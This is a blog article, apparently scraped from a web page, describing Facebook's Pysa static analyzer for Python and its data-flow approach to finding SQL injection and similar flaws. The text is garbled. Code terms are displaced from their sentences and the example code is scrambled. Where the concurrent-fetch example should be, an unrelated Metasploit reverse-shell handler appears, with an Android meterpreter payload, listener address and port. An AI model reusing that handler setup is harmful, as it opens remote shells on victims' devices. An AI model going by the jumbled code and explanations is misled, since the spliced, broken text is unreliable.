is an open-source static analysis tool built by Facebook. It has been built to detect and prevent security and privacy issues in python code. Pysa is an acronym for Python Static Analyzer. “Pysa” Pysa is a security-focused tool build on the top of Pyre, Facebook's type checker for python. It checks code and analyzes how data flows through it. Data flow analysis is useful because many security and privacy issues can be modeled as data flowing into a place it shouldn’t. It helps to detect a wide range of issues. Example: When Facebook use on their python code makes use of certain internal frameworks, which is designed to prevent access or disclose on their user data based on technical privacy policies. Pysa detects common web app security issues like SQL injection, XSS. It helps to scale application security efforts for python which is the most important codebase which powers Instagram’s servers. How Pysa Works Pysa was developed with the lessons learned from Zoncolan in mind. It used the same algorithm to perform analysis and even shares some code with . It tracks data flows through a program. The most common kinds of sources are places where user-controlled data enters the application like Django’s dictionary. Sinks tend to be much more varied but can include APIs that execute code suck as to access file systems like . It performs some rounds of analysis to build summaries to determine which functions have parameters that eventually reach a sink. Visualizing this process creates a tree with the issue of apex and source and sinks at the leaves. Zoncolan HttpRequest.GET eval os.open Positives and Negatives According to Facebook engineers, it gives some false positive and negative and they decide how to deal with it. False positives occur when a tool reports that a security issue is present where none exists. False negatives occur when a tool fails to detect and report when a real security issue is present. Here are two kinds of functionality by which users can remove these false positives and negative features: During the analysis process, pysa to complete data flow after it passes through a function to attribute the allow users to encode their domain in specific knowledge about transformations that will always render data being from a security perspective. Sanitizers — It is a little piece of metadata that can attach to flows of data as they are being tracked throughout the code. It never removes any issue from Pysa’s result. Features — Where Pysa is most Useful? Imagine this code is written by a user. # views/user.py def get_profile(request: HttpRequest) -> HttpResponse:
   profile = load_profile(request.GET[ ])
   ...
 
# controller/user.py def load_profile(user_id: str):
   user = load_user(user_id) # Loads a user safely; no SQL injection
   pictures = load_pictures(user.id)
   ...
 
# model/media.py def load_pictures(user_id: str):
   query = f result = run_query(query)
   ...
 
# model/shared.py def run_query(query: str):
   connection = create_sql_connection()
   result = connection.execute(query)
   ... async 'user_id' async async "" "
      SELECT *
      FROM pictures
      WHERE user_id = {user_id}
   " "" async await The potential SQL injection is is not exploitable because that function will only ever receive the valid that resulted from calling in the function. load_pictures user_id load_user load_profile Then, imagine that an engineer fetching the user and picture data concurrently results faster — use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost set lport exploit 192.168 .1 .126 4444 This change may look innocuous but ends up connecting the user-controlled string directly to the SQL injection issue in . In a large application with many layers between the entry point and database queries, this engineer might never realize that the data is fully , or that a SQL injection issue lurks in one of the functions called. user_id load_pictures user-controlled Open-source Pysa: Facebook makes Pysa open source to help it to find security issues. So others can use these tools for their python code. Some open-source Python frameworks such as Django and Tornedo, Pysa helps to find security issues in projects in the first run and also in record time. Limitation — There is no way to build a perfect static analyzer. Pysa has also some limitations based on its choice to detect security issues by data flow, together with design decisions that trade-off performance for precision and accuracy. Previously published behind a paywall: https://centocode.com/pysa-to-detect-and-prevent-security-issues-in-python-code-1437/

Flow

Facebook

Instagram

Portfolio

You can Support ME!!

Too Long; Didn't Read

In your car, at home, or at work — Bosch technology shapes many areas of life.

Pysa: A Tool to Prevent Security Vulnerabilities in Python

Too Long; Didn't Read

Companies Mentioned

Coin Mentioned

sunanda

About Author

TOPICS

THIS ARTICLE WAS FEATURED IN...

Pysa: A Tool to Prevent Security Vulnerabilities in Python

Too Long; Didn't Read

Companies Mentioned

Coin Mentioned

sunanda

About Author

TOPICS

THIS ARTICLE WAS FEATURED IN...

RELATED STORIES